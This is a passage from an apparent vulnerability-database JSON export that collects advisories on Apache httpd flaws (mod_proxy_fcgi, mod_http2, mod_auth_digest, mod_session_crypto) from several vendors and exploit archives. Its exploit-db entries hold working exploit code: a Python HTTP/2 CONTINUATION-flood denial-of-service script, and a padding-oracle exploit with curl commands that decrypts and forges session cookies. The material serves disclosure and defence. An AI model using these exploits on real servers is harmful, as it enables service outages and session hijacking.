massively scalable, open, software-defined\nstorage platform that combines the most stable version of the Ceph storage\nsystem with a Ceph management platform, deployment tools, and support\nservices.\n\nThe mod_proxy_fcgi package provides a proxy module for the Apache 2.2 HTTP\nserver.\n\nA buffer overflow flaw was found in mod_proxy_fcgi's handle_headers()\nfunction. A malicious FastCGI server that httpd is configured to connect to\ncould send a carefully crafted response that would cause an httpd child\nprocess handling the request to crash. (CVE-2014-3583)\n\nThis update also fixes the following bugs:\n\n* The RADOS gateway (RGW) can now properly decode the slash characters\n(\"/\") in clients' upload IDs. (BZ#1183182)\n\n* The RGW's object attribute updates could race with other object updates\noperations, which led to inconsistent object states, such as incomplete\nobject deletions. RGW now handles attribute updates correctly. (BZ#1206963)\n\n* Recreating a previously existing bucket in RGW did not remove the bucket\ninstance metadata object and created a redundant object in the RGW pool.\nThe redundant objects are no longer generated. (BZ#1212524)\n\n* The Content-Length header is now correctly created when creating a\ncontainer using the Swift API. (BZ#1213988)\n\n* RGW did not properly cache users' keystone tokens and validated all\nkeystone tokens for every Swift operation. RGW now caches tokens correctly,\nso that the token validation occurs only when necessary. (BZ#1213999)\n\n* Modifying a user's Access Control List (ACL) permissions for an object in\nRGW inappropriately caused the user to become the owner of the object.\nThis update fixes this bug. (BZ#1214051)\n\n* RGW could fail to update the bucket attributes during a Swift API \"POST\"\noperation. RGW now correctly updates the bucket attributes. (BZ#1214058)\n\n* RGW no longer terminated unexpectedly when using keystone authentication\nto copy an object. (BZ#1214061)\n\n* An attempt to download an object greater than 512 KB using a range header\nfailed when using the Swift API. Objects can now be downloaded as expected.\n(BZ#1214854)\n\n* When using OpenStack's Cinder RADOS Block Device (RBD) back-end driver\nwith Ceph administration socket enabled, Ceph could leak file descriptors\nand eventually consume the maximum number of allowed opened files.\nThis behavior caused Cinder's RBD connections to fail. Now, Ceph closes the\nadministration socket appropriately. (BZ#1220496)\n\n* When a part of a multi-part object was resent, the object became broken\ndue a discrepancy between the object size when listing the object and when\nstating the object. Now, multi-part objects no longer become broken in such\na case. (BZ#1222091)\n\n* When the number of placement groups (PGs) in a pool was increased, Ceph\ndid not send watch or notify operations correctly. Consequently, the librbd\nlibrary presented inconsistent RBD snapshot data. Now, Ceph correctly\nre-sends operations. (BZ#1245785)\n\n* When reopening log files, Object Storage Devices (OSDs) could write data\nto the incorrect file descriptor. Consequently, log entries were lost, or\nwere written to a file descriptor, which was opened by the filestore.\nThe latter case could cause data corruption. This bug has been fixed.\n(BZ#1247752)\n\nAll mod_proxy_fcgi and ceph users are advised to upgrade to these updated\npackages, which correct these issues.", "modified": "2018-06-07T08:59:16", "published": "2015-10-02T00:52:51", "id": "RHSA-2015:1858", "href": "https://access.redhat.com/errata/RHSA-2015:1858", "type": "redhat", "title": "(RHSA-2015:1858) Low: mod_proxy_fcgi and ceph security and bug fix update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-08-13T18:44:59", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3583"], "description": "Red Hat Ceph Storage is a massively scalable, open, software-defined\nstorage platform that combines the most stable version of the Ceph storage\nsystem with a Ceph management platform, deployment tools, and support\nservices.\n\nThe mod_proxy_fcgi package provides a proxy module for the Apache 2.2 HTTP\nserver.\n\nA buffer overflow flaw was found in mod_proxy_fcgi's handle_headers()\nfunction. A malicious FastCGI server that httpd is configured to connect to\ncould send a carefully crafted response that would cause an httpd child\nprocess handling the request to crash. (CVE-2014-3583)\n\nAll mod_proxy_fcgi users are advised to upgrade to this updated package,\nwhich corrects this issue.", "modified": "2018-06-07T08:58:46", "published": "2015-10-02T00:03:29", "id": "RHSA-2015:1855", "href": "https://access.redhat.com/errata/RHSA-2015:1855", "type": "redhat", "title": "(RHSA-2015:1855) Low: mod_proxy_fcgi security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "centos": [{"lastseen": "2020-12-08T03:36:26", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2161", "CVE-2016-4975", "CVE-2016-8743", "CVE-2016-0736"], "description": "**CentOS Errata and Security Advisory** CESA-2017:0906\n\n\nThe httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.\n\nSecurity Fix(es):\n\n* It was discovered that the mod_session_crypto module of httpd did not use any mechanisms to verify integrity of the encrypted session data stored in the user's browser. A remote attacker could use this flaw to decrypt and modify session data using a padding oracle attack. (CVE-2016-0736)\n\n* It was discovered that the mod_auth_digest module of httpd did not properly check for memory allocation failures. A remote attacker could use this flaw to cause httpd child processes to repeatedly crash if the server used HTTP digest authentication. (CVE-2016-2161)\n\n* It was discovered that the HTTP parser in httpd incorrectly allowed certain characters not permitted by the HTTP protocol specification to appear unencoded in HTTP request headers. If httpd was used in conjunction with a proxy or backend server that interpreted those characters differently, a remote attacker could possibly use this flaw to inject data into HTTP responses, resulting in proxy cache poisoning. (CVE-2016-8743)\n\nNote: The fix for the CVE-2016-8743 issue causes httpd to return \"400 Bad Request\" error to HTTP clients which do not strictly follow HTTP protocol specification. A newly introduced configuration directive \"HttpProtocolOptions Unsafe\" can be used to re-enable the old less strict parsing. However, such setting also re-introduces the CVE-2016-8743 issue.\n\nBug Fix(es):\n\n* When waking up child processes during a graceful restart, the httpd parent process could attempt to open more connections than necessary if a large number of child processes had been active prior to the restart. Consequently, a graceful restart could take a long time to complete. With this update, httpd has been fixed to limit the number of connections opened during a graceful restart to the number of active children, and the described problem no longer occurs. (BZ#1420002)\n\n* Previously, httpd running in a container returned the 500 HTTP status code (Internal Server Error) when a connection to a WebSocket server was closed. As a consequence, the httpd server failed to deliver the correct HTTP status and data to a client. With this update, httpd correctly handles all proxied requests to the WebSocket server, and the described problem no longer occurs. (BZ#1429947)\n\n* In a configuration using LDAP authentication with the mod_authnz_ldap module, the name set using the AuthLDAPBindDN directive was not correctly used to bind to the LDAP server for all queries. Consequently, authorization attempts failed. The LDAP modules have been fixed to ensure the configured name is correctly bound for LDAP queries, and authorization using LDAP no longer fails. (BZ#1420047)\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2017-April/034418.html\n\n**Affected packages:**\nhttpd\nhttpd-devel\nhttpd-manual\nhttpd-tools\nmod_ldap\nmod_proxy_html\nmod_session\nmod_ssl\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2017-0906.html", "edition": 6, "modified": "2017-04-13T10:59:52", "published": "2017-04-13T10:59:52", "id": "CESA-2017:0906", "href": "http://lists.centos.org/pipermail/centos-announce/2017-April/034418.html", "title": "httpd, mod_ldap, mod_proxy_html, mod_session, mod_ssl security update", "type": "centos", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "hackerone": [{"lastseen": "2018-09-29T22:12:45", "bulletinFamily": "bugbounty", "bounty": 500.0, "cvelist": ["CVE-2014-3583"], "description": "_This issue was reported directly to the Apache team._\n\nA buffer overflow was found in mod_proxy_fcgi. A malicious FastCGI server could send a carefully crafted response which could lead to a heap buffer overflow.\n\nhttp://httpd.apache.org/security/vulnerabilities_24.html#2.4.11-dev\n", "modified": "2014-11-12T00:00:00", "published": "2014-09-17T00:00:00", "id": "H1:36264", "href": "https://hackerone.com/reports/36264", "type": "hackerone", "title": "Apache httpd (IBB): mod_proxy_fcgi buffer overflow", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "httpd": [{"lastseen": "2016-09-26T21:39:37", "bulletinFamily": "software", "cvelist": ["CVE-2014-3583"], "edition": 1, "description": "\nAn out-of-bounds memory read was found in mod_proxy_fcgi. A malicious\nFastCGI server could send a carefully crafted response which could\nlead to a crash when reading past the end of a heap memory or stack\nbuffer. This issue affects version 2.4.10 only.\n", "modified": "2015-01-30T00:00:00", "published": "2014-09-17T00:00:00", "id": "HTTPD:000FDE4E492EE77384DAD86EE8D97E4D", "href": "https://httpd.apache.org/security_report.html", "type": "httpd", "title": "Apache Httpd < 2.4.12: mod_proxy_fcgi out-of-bounds memory read", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2020-12-24T14:26:50", "bulletinFamily": "software", "cvelist": ["CVE-2014-3583"], "description": "\nAn out-of-bounds memory read was found in mod_proxy_fcgi. A malicious\nFastCGI server could send a carefully crafted response which could\nlead to a crash when reading past the end of a heap memory or stack\nbuffer. This issue affects version 2.4.10 only.\n", "edition": 5, "modified": "2014-11-12T00:00:00", "published": "2014-09-17T00:00:00", "id": "HTTPD:BC9D721F4559FBD6CD9FC08B4A702A04", "href": "https://httpd.apache.org/security_report.html", "title": "Apache Httpd < None: mod_proxy_fcgi out-of-bounds memory read", "type": "httpd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2016-12-20T22:05:49", "bulletinFamily": "software", "cvelist": ["CVE-2016-8740"], "edition": 1, "description": "\n The HTTP/2 protocol implementation (mod_http2) had an incomplete handling\n of the \n LimitRequestFields\n directive. This allowed an attacker to inject unlimited request headers into\n the server, leading to eventual memory exhaustion.\n", "modified": "2016-12-20T00:00:00", "published": "2016-11-22T00:00:00", "href": "https://httpd.apache.org/security_report.html", "id": "HTTPD:E91F31FD116386F2922B3EDA4BE3899B", "title": "Apache Httpd < 2.4.25: HTTP/2 CONTINUATION denial of service", "type": "httpd", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2020-12-24T14:26:50", "bulletinFamily": "software", "cvelist": ["CVE-2016-8740"], "description": "\n The HTTP/2 protocol implementation (mod_http2) had an incomplete handling\n of the \n LimitRequestFields\n directive. This allowed an attacker to inject unlimited request headers into\n the server, leading to eventual memory exhaustion.\n", "edition": 5, "modified": "2016-12-04T00:00:00", "published": "2016-11-22T00:00:00", "id": "HTTPD:D0D55654F7429E8A4965CBBE30779CD6", "href": "https://httpd.apache.org/security_report.html", "title": "Apache Httpd < None: HTTP/2 CONTINUATION denial of service", "type": "httpd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2016-12-07T12:48:55", "bulletinFamily": "software", "cvelist": ["CVE-2016-8740"], "edition": 2, "description": "\n\n The HTTP/2 protocol implementation (mod_http2) had an incomplete handling\n of the \n LimitRequestFields\n directive. This allowed an attacker to inject unlimited request headers into\n the server, leading to eventual memory exhaustion.\n", "modified": "2016-12-04T00:00:00", "published": "2016-11-22T00:00:00", "href": "https://httpd.apache.org/security_report.html", "id": "HTTPD:18105DABC6D0ADE97D12B90F63EAE025", "type": "httpd", "title": "Apache Httpd < 2.4.24-dev: HTTP/2 CONTINUATION denial of service", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2020-12-24T14:26:50", "bulletinFamily": "software", "cvelist": ["CVE-2016-2161"], "description": "\n Malicious input to mod_auth_digest will cause the server to crash, and \n each instance continues to crash even for subsequently valid requests.\n", "edition": 5, "modified": "2016-12-20T00:00:00", "published": "2016-07-11T00:00:00", "id": "HTTPD:D5609C15618DCADFDAD5AD396F2B83D7", "href": "https://httpd.apache.org/security_report.html", "title": "Apache Httpd < None: DoS vulnerability in mod_auth_digest", "type": "httpd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-08-04T12:16:46", "bulletinFamily": "software", "cvelist": ["CVE-2016-2161"], "edition": 2, "description": "\n Malicious input to mod_auth_digest will cause the server to crash, and \n each instance continues to crash even for subsequently valid requests.\n", "modified": "2016-12-20T00:00:00", "published": "2016-07-11T00:00:00", "href": "https://httpd.apache.org/security_report.html", "id": "HTTPD:6CAC4F8B58BB2BE168795A6BA0CA26A1", "title": "Apache Httpd < 2.4.25: DoS vulnerability in mod_auth_digest", "type": "httpd", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-08-04T12:16:46", "bulletinFamily": "software", "cvelist": ["CVE-2016-0736"], "edition": 3, "description": "\n Prior to Apache HTTP release 2.4.25, mod_sessioncrypto was encrypting its\n data/cookie using the configured ciphers with possibly either CBC or ECB\n modes of operation (AES256-CBC by default), hence no selectable or builtin\n authenticated encryption.\n This made it vulnerable to padding oracle attacks, particularly with CBC.\n An authentication tag (SipHash MAC) is now added to prevent such attacks.\n", "modified": "2016-12-20T00:00:00", "published": "2016-01-20T00:00:00", "id": "HTTPD:BD5F2FE0FF24D28F3450C11422A68AC8", "href": "https://httpd.apache.org/security_report.html", "title": "Apache Httpd < 2.4.25: Padding Oracle in Apache mod_session_crypto", "type": "httpd", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2020-12-24T14:26:50", "bulletinFamily": "software", "cvelist": ["CVE-2016-0736"], "description": "\n Prior to Apache HTTP release 2.4.25, mod_sessioncrypto was encrypting its\n data/cookie using the configured ciphers with possibly either CBC or ECB\n modes of operation (AES256-CBC by default), hence no selectable or builtin\n authenticated encryption.\n This made it vulnerable to padding oracle attacks, particularly with CBC.\n An authentication tag (SipHash MAC) is now added to prevent such attacks.\n", "edition": 5, "modified": "2016-12-20T00:00:00", "published": "2016-01-20T00:00:00", "id": "HTTPD:174A0D44882BCA7E2F229BC91D6D5A09", "href": "https://httpd.apache.org/security_report.html", "title": "Apache Httpd < None: Padding Oracle in Apache mod_session_crypto", "type": "httpd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "kaspersky": [{"lastseen": "2020-09-02T11:53:34", "bulletinFamily": "info", "cvelist": ["CVE-2016-8740"], "description": "### *Detect date*:\n12/05/2016\n\n### *Severity*:\nWarning\n\n### *Description*:\nAn unspecified vulnerability was found in Apache HTTP Server 2.4.17 through 2.4.23. By exploiting this vulnerability malicious users can cause denial of service. This vulnerability can be exploited remotely via crafted continuation frames in a HTTP/2 request.\n\n### *Affected products*:\nApache HTTP Server from 2.4.17 to 2.4.23\n\n### *Solution*:\nFor a 2.4.23 version a patch is supplied. This will be included in the next release. \n[Security Advisory \u2013 Apache Software Foundation](<http://www.securityfocus.com/archive/1/539873/30/0/threaded>)\n\n### *Original advisories*:\n[Apache httpd 2.4 vulnerabilities](<https://httpd.apache.org/security/vulnerabilities_24.html>) \n\n\n### *Impacts*:\nDoS \n\n### *Related products*:\n[Apache HTTP Server](<https://threats.kaspersky.com/en/product/Apache-HTTP-Server/>)\n\n### *CVE-IDS*:\n[CVE-2016-8740](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8740>)5.0Critical\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "edition": 41, "modified": "2020-06-18T00:00:00", "published": "2016-12-05T00:00:00", "id": "KLA10907", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10907", "title": "\r KLA10907Denial of service vulnerability in Apache HTTP Server ", "type": "kaspersky", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "exploitdb": [{"lastseen": "2018-11-30T12:32:58", "description": "", "published": "2016-12-12T00:00:00", "type": "exploitdb", "title": "Apache 2.4.23 mod_http2 - Denial of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-8740"], "modified": "2016-12-12T00:00:00", "id": "EDB-ID:40909", "href": "https://www.exploit-db.com/exploits/40909", "sourceData": "#!/usr/bin/python\r\n\r\n\"\"\" source : http://seclists.org/bugtraq/2016/Dec/3\r\nThe mod_http2 module in the Apache HTTP Server 2.4.17 through 2.4.23, when the Protocols configuration includes h2 or h2c, does not restrict request-header length, which allows remote attackers to cause a denial of service (memory consumption) via crafted CONTINUATION frames in an HTTP/2 request.(https://access.redhat.com/security/cve/cve-2016-8740)\r\n\r\nUsage : cve-2016-8740.py [HOST] [PORT]\r\n\"\"\"\r\n\r\nimport sys\r\nimport struct\r\nimport socket\r\n\r\nHOST = sys.argv[1]\r\nPORT = int(sys.argv[2])\r\n\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((HOST, PORT))\r\n\r\n# https://http2.github.io/http2-spec/#ConnectionHeader\r\ns.sendall('PRI * HTTP/2.0\\r\\n\\r\\nSM\\r\\n\\r\\n')\r\n\r\n# https://http2.github.io/http2-spec/#SETTINGS\r\nSETTINGS = struct.pack('3B', 0x00, 0x00, 0x00) # Length\r\nSETTINGS += struct.pack('B', 0x04) # Type\r\nSETTINGS += struct.pack('B', 0x00)\r\nSETTINGS += struct.pack('>I', 0x00000000)\r\ns.sendall(SETTINGS)\r\n\r\n# https://http2.github.io/http2-spec/#HEADERS\r\nHEADER_BLOCK_FRAME = '\\x82\\x84\\x86\\x41\\x86\\xa0\\xe4\\x1d\\x13\\x9d\\x09\\x7a\\x88\\x25\\xb6\\x50\\xc3\\xab\\xb6\\x15\\xc1\\x53\\x03\\x2a\\x2f\\x2a\\x40\\x83\\x18\\xc6\\x3f\\x04\\x76\\x76\\x76\\x76'\r\nHEADERS = struct.pack('>I', len(HEADER_BLOCK_FRAME))[1:] # Length\r\nHEADERS += struct.pack('B', 0x01) # Type\r\nHEADERS += struct.pack('B', 0x00) # Flags\r\nHEADERS += struct.pack('>I', 0x00000001) # Stream ID\r\ns.sendall(HEADERS + HEADER_BLOCK_FRAME)\r\n\r\n# Sending CONTINUATION frames for leaking memory\r\n# https://http2.github.io/http2-spec/#CONTINUATION\r\nwhile True:\r\n HEADER_BLOCK_FRAME = '\\x40\\x83\\x18\\xc6\\x3f\\x04\\x76\\x76\\x76\\x76'\r\n HEADERS = struct.pack('>I', len(HEADER_BLOCK_FRAME))[1:] # Length\r\n HEADERS += struct.pack('B', 0x09) # Type\r\n HEADERS += struct.pack('B', 0x01) # Flags\r\n HEADERS += struct.pack('>I', 0x00000001) # Stream ID\r\n s.sendall(HEADERS + HEADER_BLOCK_FRAME)", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/40909"}, {"lastseen": "2016-12-23T17:58:41", "description": "Apache mod_session_crypto - Padding Oracle. CVE-2016-0736. Webapps exploit for Multiple platform", "published": "2016-12-23T00:00:00", "type": "exploitdb", "title": "Apache mod_session_crypto - Padding Oracle", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0736"], "modified": "2016-12-23T00:00:00", "id": "EDB-ID:40961", "href": "https://www.exploit-db.com/exploits/40961/", "sourceData": "'''\r\nAdvisory: Padding Oracle in Apache mod_session_crypto\r\n\r\nDuring a penetration test, RedTeam Pentesting discovered a Padding\r\nOracle vulnerability in mod_session_crypto of the Apache web server.\r\nThis vulnerability can be exploited to decrypt the session data and even\r\nencrypt attacker-specified data.\r\n\r\n\r\nDetails\r\n=======\r\n\r\nProduct: Apache HTTP Server mod_session_crypto\r\nAffected Versions: 2.3 to 2.5\r\nFixed Versions: 2.4.25\r\nVulnerability Type: Padding Oracle\r\nSecurity Risk: high\r\nVendor URL: https://httpd.apache.org/docs/trunk/mod/mod_session_crypto.html\r\nVendor Status: fixed version released\r\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2016-001.txt\r\nAdvisory Status: published\r\nCVE: CVE-2016-0736\r\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0736\r\n\r\n\r\nIntroduction\r\n============\r\n\r\nThe module mod_session_crypto of the Apache HTTP Server can be used in\r\nconjunction with the modules mod_session and mod_session_cookie to store\r\nsession data in an encrypted cookie within the users' browsers. This\r\navoids server-side session state so that incoming HTTP requests can be\r\neasily distributed amongst a number of application web servers which do\r\nnot need to share session state.\r\n\r\n\r\nMore Details\r\n============\r\n\r\nThe module mod_session_crypto uses symmetric cryptography to encrypt and\r\ndecrypt session data and uses mod_session to store the encrypted data in\r\na cookie (usually called \"session\") within the user's browser. The\r\ndecrypted session is then made available to the application in an\r\nenvironment variable (in case of a CGI script) or in a custom HTTP\r\nrequest header. The application can add a custom HTTP response header\r\n(usually \"X-Replace-Session\") which instructs the HTTP server to replace\r\nthe session's content with the value of the header. Detailed\r\ninstructions to set up mod_session and mod_session_crypto can be found\r\nin the documentation:\r\nhttps://httpd.apache.org/docs/2.4/mod/mod_session.html#basicexamples\r\n\r\nThe module mod_session_crypto is configured to use either 3DES or AES\r\nwith various key sizes, defaulting to AES256. Encryption is handled by\r\nthe function \"encrypt_string\":\r\n\r\nmodules/session/mod_session_crypto.c\r\n------------------------------------------------------------------------\r\n/**\r\n * Encrypt the string given as per the current config.\r\n *\r\n * Returns APR_SUCCESS if successful.\r\n */\r\nstatic apr_status_t encrypt_string(request_rec * r, const apr_crypto_t *f,\r\n session_crypto_dir_conf *dconf, const char *in, char **out)\r\n{\r\n[...]\r\n apr_crypto_key_t *key = NULL;\r\n[...]\r\n const unsigned char *iv = NULL;\r\n[...]\r\n\r\n /* use a uuid as a salt value, and prepend it to our result */\r\n apr_uuid_get(&salt);\r\n\r\n[...]\r\n\r\n res = apr_crypto_passphrase(&key, &ivSize, passphrase,\r\n strlen(passphrase),\r\n (unsigned char *) (&salt), sizeof(apr_uuid_t),\r\n *cipher, APR_MODE_CBC, 1, 4096, f, r->pool);\r\n\r\n[...]\r\n\r\n res = apr_crypto_block_encrypt_init(&block, &iv, key, &blockSize, r->pool);\r\n[...]\r\n res = apr_crypto_block_encrypt(&encrypt, &encryptlen, (unsigned char *)in,\r\n strlen(in), block);\r\n[...]\r\n res = apr_crypto_block_encrypt_finish(encrypt + encryptlen, &tlen, block);\r\n[...]\r\n\r\n /* prepend the salt and the iv to the result */\r\n combined = apr_palloc(r->pool, ivSize + encryptlen + sizeof(apr_uuid_t));\r\n memcpy(combined, &salt, sizeof(apr_uuid_t));\r\n memcpy(combined + sizeof(apr_uuid_t), iv, ivSize);\r\n memcpy(combined + sizeof(apr_uuid_t) + ivSize, encrypt, encryptlen);\r\n\r\n /* base64 encode the result */\r\n base64 = apr_palloc(r->pool, apr_base64_encode_len(ivSize + encryptlen +\r\n sizeof(apr_uuid_t) + 1)\r\n * sizeof(char));\r\n[...]\r\n return res;\r\n}\r\n------------------------------------------------------------------------\r\n\r\nThe source code shows that an encryption key is derived from the\r\nconfigured password and a randomly chosen salt by calling the function\r\n\"apr_crypto_passphrase\". This function internally uses PBKDF2 to derive\r\nthe key. The data is then encrypted and the salt and IV prepended to the\r\nencrypted data. Before returning to the caller, the result is encoded as\r\nbase64.\r\n\r\nThis procedure does not guarantee integrity of the ciphertext, so the\r\nApache module is unable to detect whether a session sent back to the\r\nserver has been tampered with. Depending on the application this often\r\nmeans that attackers are able to exploit a Padding Oracle vulnerability.\r\nThis allows decrypting the session and encrypting arbitrary data chosen\r\nby the attacker.\r\n\r\n\r\nProof of Concept\r\n================\r\n\r\nThe vulnerability can be reproduced as follows. First, the modules\r\nmod_session, mod_session_crypto and mod_session_cookie are enabled and\r\nconfigured:\r\n\r\n------------------------------------------------------------------------\r\nSession On\r\nSessionEnv On\r\nSessionCookieName session path=/\r\nSessionHeader X-Replace-Session\r\nSessionCryptoPassphrase RedTeam\r\n------------------------------------------------------------------------\r\n\r\nIn addition, CGI scripts are enabled for a folder and the following CGI\r\nscript is saved as \"status.rb\" and is made available to clients:\r\n\r\n------------------------------------------------------------------------\r\n#!/usr/bin/env ruby\r\n\r\nrequire 'cgi'\r\n\r\ncgi = CGI.new\r\ndata = CGI.parse(ENV['HTTP_SESSION'])\r\n\r\nif data.has_key? 'username'\r\n puts\r\n puts \"your username is %s\" % data['username']\r\n exit\r\nend\r\n\r\nputs \"X-Replace-Session: username=guest&timestamp=\" + Time.now.strftime(\"%s\")\r\nputs\r\nputs \"not logged in\"\r\n------------------------------------------------------------------------\r\n\r\nOnce the CGI script is correctly set up, the command-line HTTP client curl\r\ncan be used to access it:\r\n\r\n------------------------------------------------------------------------\r\n$ curl -i http://127.0.0.1:8080/cgi-bin/status.rb\r\nHTTP/1.1 200 OK\r\nDate: Tue, 19 Jan 2016 13:23:19 GMT\r\nServer: Apache/2.4.10 (Ubuntu)\r\nSet-Cookie: session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vpLQ\r\n l1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=;path=/\r\nCache-Control: no-cache\r\nSet-Cookie: session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vpLQ\r\n l1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=;path=/\r\nTransfer-Encoding: chunked\r\nContent-Type: application/x-ruby\r\n\r\nnot logged in\r\n------------------------------------------------------------------------\r\n\r\nThe example shows that a new encrypted cookie with the name \"session\" is\r\nreturned, and the response body contains the text \"not logged in\".\r\nCalling the script again with the cookie just returned reveals that the\r\nusername in the session is set to \"guest\":\r\n\r\n------------------------------------------------------------------------\r\n$ curl -b session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vp\\\r\nLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU= \\\r\nhttp://127.0.0.1:8080/cgi-bin/status.rb\r\n\r\nyour username is guest\r\n------------------------------------------------------------------------\r\n\r\nSending a modified cookie ending in \"u=\" instead of \"U=\" will invalidate\r\nthe padding at the end of the ciphertext, so the session cannot be\r\ndecrypted correctly and is therefore not passed to the CGI script, which\r\nreturns the text \"not logged in\" again:\r\n\r\n------------------------------------------------------------------------\r\n$ curl -b session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vp\\\r\nLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRu= \\\r\nhttp://127.0.0.1:8080/cgi-bin/status.rb\r\n\r\nnot logged in\r\n------------------------------------------------------------------------\r\n\r\nThis verifies the existence of the Padding Oracle vulnerability. The\r\nPython library[1] python-paddingoracle was then used to implement\r\ndecrypting the session by exploiting the Padding Oracle vulnerability.\r\n\r\nexploit.py\r\n------------------------------------------------------------------------\r\n'''\r\n\r\nfrom paddingoracle import BadPaddingException, PaddingOracle\r\nfrom base64 import b64encode, b64decode\r\nimport requests\r\n\r\nclass PadBuster(PaddingOracle):\r\n def __init__(self, valid_cookie, **kwargs):\r\n super(PadBuster, self).__init__(**kwargs)\r\n self.wait = kwargs.get('wait', 2.0)\r\n self.valid_cookie = valid_cookie\r\n\r\n def oracle(self, data, **kwargs):\r\n v = b64encode(self.valid_cookie+data)\r\n\r\n response = requests.get('http://127.0.0.1:8080/cgi-bin/status.rb',\r\n cookies=dict(session=v), stream=False, timeout=5, verify=False)\r\n\r\n if 'username' in response.content:\r\n logging.debug('No padding exception raised on %r', v)\r\n return\r\n\r\n raise BadPaddingException\r\n\r\nif __name__ == '__main__':\r\n import logging\r\n import sys\r\n\r\n if not sys.argv[2:]:\r\n print 'Usage: [encrypt|decrypt] <session value> <plaintext>'\r\n sys.exit(1)\r\n\r\n logging.basicConfig(level=logging.WARN)\r\n mode = sys.argv[1]\r\n session = b64decode(sys.argv[2])\r\n padbuster = PadBuster(session)\r\n\r\n if mode == \"decrypt\":\r\n cookie = padbuster.decrypt(session[32:], block_size=16, iv=session[16:32])\r\n print('Decrypted session:\\n%r' % cookie)\r\n elif mode == \"encrypt\":\r\n key = session[0:16]\r\n plaintext = sys.argv[3]\r\n\r\n s = padbuster.encrypt(plaintext, block_size=16)\r\n\r\n data = b64encode(key+s[0:len(s)-16])\r\n print('Encrypted session:\\n%s' % data)\r\n else:\r\n print \"invalid mode\"\r\n sys.exit(1)\r\n\r\n'''\r\n------------------------------------------------------------------------\r\n\r\nThis Python script can then be used to decrypt the session:\r\n\r\n------------------------------------------------------------------------\r\n$ time python exploit.py decrypt sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4\\\r\nHztmf0CFsp1vpLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=\r\nDecrypted session:\r\nb'username=guest&timestamp=1453282205\\r\\r\\r\\r\\r\\r\\r\\r\\r\\r\\r\\r\\r'\r\n\r\nreal 6m43.088s\r\nuser 0m15.464s\r\nsys 0m0.976s\r\n------------------------------------------------------------------------\r\n\r\nIn this sample application, the username and a timestamp are included in\r\nthe session data. The Python script can also be used to encrypt a new\r\nsession containing the username \"admin\":\r\n\r\n------------------------------------------------------------------------\r\n$ time python exploit.py encrypt sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4\\\r\nHztmf0CFsp1vpLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYB\\\r\nRU= username=admin\r\n\r\nEncrypted session:\r\nsxGTJsP1TqiPrbKVM1GAXPZQZNxCxjK938K9tufqX9xDLFciz7zmQ/GLFjF4pcXY\r\n\r\nreal3m38.002s\r\nusers0m8.536s\r\nsys0m0.512s\r\n\r\n------------------------------------------------------------------------\r\n\r\nSending this newly encrypted session to the server shows that the\r\nusername is now \"admin\":\r\n\r\n------------------------------------------------------------------------\r\n$ curl -b 